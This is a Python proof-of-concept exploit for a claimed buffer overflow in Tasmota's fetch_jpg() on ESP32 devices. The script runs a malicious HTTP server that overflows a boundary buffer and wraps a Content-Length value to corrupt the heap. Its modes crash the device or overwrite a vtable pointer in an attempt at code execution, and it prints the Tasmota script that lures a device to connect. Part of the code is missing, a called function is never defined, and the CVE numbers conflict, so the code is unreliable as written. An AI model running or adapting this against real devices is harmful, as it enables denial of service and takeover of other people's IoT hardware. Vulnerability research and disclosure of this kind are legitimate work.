#!/usr/bin/env python3 """ PoC: CVE-2026-38422 Target: Tasmota <= 15.3.0.3 File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino Function: fetch_jpg() Vulnerability: Combined attack vector using both overflow conditions in fetch_jpg(): 1. Initial connection (case 0) — boundary overflow via strcpy() 2. Frame fetch (case 2) — uint16_t wraparound via Content-Length The combination of both in a single attack session maximizes heap corruption and increases RCE probability on ESP32. Buffer layout on ESP32 heap (typical): struct JPG_TASK { Offset Size char boundary[40]; +0x00 40 bool draw; +0x28 1 uint8_t scale; +0x29 1 uint16_t xp; +0x2A 2 uint16_t yp; +0x2C 2 WiFiClient stream; +0x2E ~80 ← vtable ptr at +0x2E HTTPClient http; +0x7E ~200 ← vtable ptr at +0x7E } jpg_task; Overwriting WiFiClient vtable ptr with controlled value → RCE when any virtual method (read, write, connect) is called. Attack Flow: Phase 1: Send initial response with long boundary (overflow boundary[40]) Phase 2: Send MJPEG frame with Content-Length > 65535 (uint16_t wrap) Result: Heap corruption → potential RCE / guaranteed DoS Author: Saidakbarxon Maxsudxonov CVE: CVE-2026-38422 """ import socket import argparse import struct import time from datetime import datetime BANNER = """ ╔══════════════════════════════════════════════════════╗ ║ CVE-2026-38422 PoC — Tasmota fetch_jpg() ║ ║ Combined Buffer Overflow → RCE / DoS ║ ║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║ ╚══════════════════════════════════════════════════════╝ """ def log(msg, level="*"): ts = datetime.now().strftime("%H:%M:%S") print(f"[{ts}] [{level}] {msg}") # ESP32 Xtensa architecture constants ESP32_HEAP_BASE = 0x3FFB0000 # Typical DRAM heap start WIFI_CLIENT_VTABLE = 0x400D1234 # Placeholder — requires firmware analysis def build_phase1_boundary(fake_vtable=None): """ Phase 1: Overflow boundary[40] via strcpy() Layout: [boundary 40B][draw 1B][scale 1B][xp 2B][yp 2B][WiFiClient vtable 4B] Total to reach vtable: 40 + 1 + 1 + 2 + 2 = 46 bytes """ if fake_vtable is None: # Crash mode: fill with 0x41 to confirm overflow payload = b"A" * 39 + b"\x00" # null-terminate at 40 payload += b"B" * 6 # overwrite draw/scale/xp/yp payload += b"C" * 4 # corrupt WiFiClient vtable else: # RCE mode: overwrite vtable with controlled address payload = b"A" * 39 + b"\x00" payload += b"\x01" # draw = true payload += b"\x01" # scale = 1 payload += struct.pack(" 65535 for uint16_t wraparound. content_length=70000 → uint16_t = 4464 → malloc(4464) But stream has 70000 bytes → 65536 bytes remain unread """ wrapped = content_length & 0xFFFF # Send actual content_length bytes of data jpeg_payload = (b'\xff\xd8' + # JPEG SOI b'\xff\xe0\x00\x10' + # APP0 b'JFIF\x00\x01\x01\x00' + b'\x00\x01\x00\x01\x00\x00' + b'\x41' * (content_length - 20) + # padding b'\xff\xd9') # JPEG EOI jpeg_payload = jpeg_payload[:content_length] frame = ( f"--BOUNDARY_OVERFLOW_PAYLOAD\r\n" f"Content-Type: image/jpeg\r\n" f"Content-Length: {content_length}\r\n" f"\r\n" ).encode() + jpeg_payload return frame, wrapped def handle_client(conn, addr, mode, vtable): log(f"Tasmota connected from {addr[0]}:{addr[1]}", "+") try: # Receive HTTP request req = conn.recv(2048).decode('utf-8', errors='ignore') if req: log(f"HTTP request: {req.splitlines()[0]}") log("=" * 52) log("PHASE 1: Boundary strcpy() overflow (CVE-2026-38426)") log("=" * 52) # Build overflow payload if mode == "rce" and vtable: vtable_addr = int(vtable, 16) boundary_payload = build_phase1_boundary(fake_vtable=vtable_addr) log(f"Fake vtable address: 0x{vtable_addr:08X}", "!") else: boundary_payload = build_phase1_boundary() log(f"Boundary payload: {len(boundary_payload)} bytes", "!") log(f"Overflow: {max(0, len(boundary_payload)-39)} bytes beyond boundary[40]", "!") # Send Phase 1 response = make_initial_response(boundary_payload) conn.send(response) log("Phase 1 sent — boundary[40] overflowed via strcpy()", "!") time.sleep(1) log("=" * 52) log("PHASE 2: uint16_t wraparound (CVE-2026-38427)") log("=" * 52) content_length = 70000 frame, wrapped = make_overflow_frame(content_length) log(f"Content-Length header: {content_length}", "!") log(f"uint16_t(70000) = {wrapped} bytes allocated", "!") log(f"Unread stream bytes: {content_length - wrapped}", "!") conn.send(frame) log("Phase 2 sent — heap/stream corruption triggered", "!") log("Expected result: Guru Meditation Error / device reboot", "!") time.sleep(3) except BrokenPipeError: log("Device disconnected — likely crashed! ✓", "+") except Exception as e: log(f"Error: {e}", "-") finally: conn.close() log("Session complete") def main(): print(BANNER) parser = argparse.ArgumentParser(description="CVE-2026-38422 Combined PoC") parser.add_argument("--ip", default="0.0.0.0") parser.add_argument("--port", type=int, default=8887) parser.add_argument("--mode", choices=["dos", "rce"], default="dos", help="dos=crash only, rce=attempt vtable overwrite") parser.add_argument("--vtable", type=str, default=None, help="Fake vtable address for RCE (e.g. 0x3FFB1000)") args = parser.parse_args() log("CVE-2026-38422 — Combined Attack PoC", "+") log(f"Mode: {args.mode.upper()}") log(f"Listening: {args.ip}:{args.port}") log("─" * 54) log("Attack phases:") log(" Phase 1: strcpy(boundary[40]) → overflow (CVE-2026-38426)") log(" Phase 2: uint16_t Content-Length → wraparound (CVE-2026-38427)") log("─" * 54) log("Tasmota script to trigger:") log(" >D") log(" >B") log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)") log(" >1") log(" =fetchjp(2,0,0,1)") log("─" * 54) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((args.ip, args.port)) server.listen(5) log("Waiting for Tasmota device...", "*") try: while True: conn, addr = server.accept() handle_client(conn, addr, args.mode, args.vtable) except KeyboardInterrupt: log("Stopped") finally: server.close() if __name__ == "__main__": main()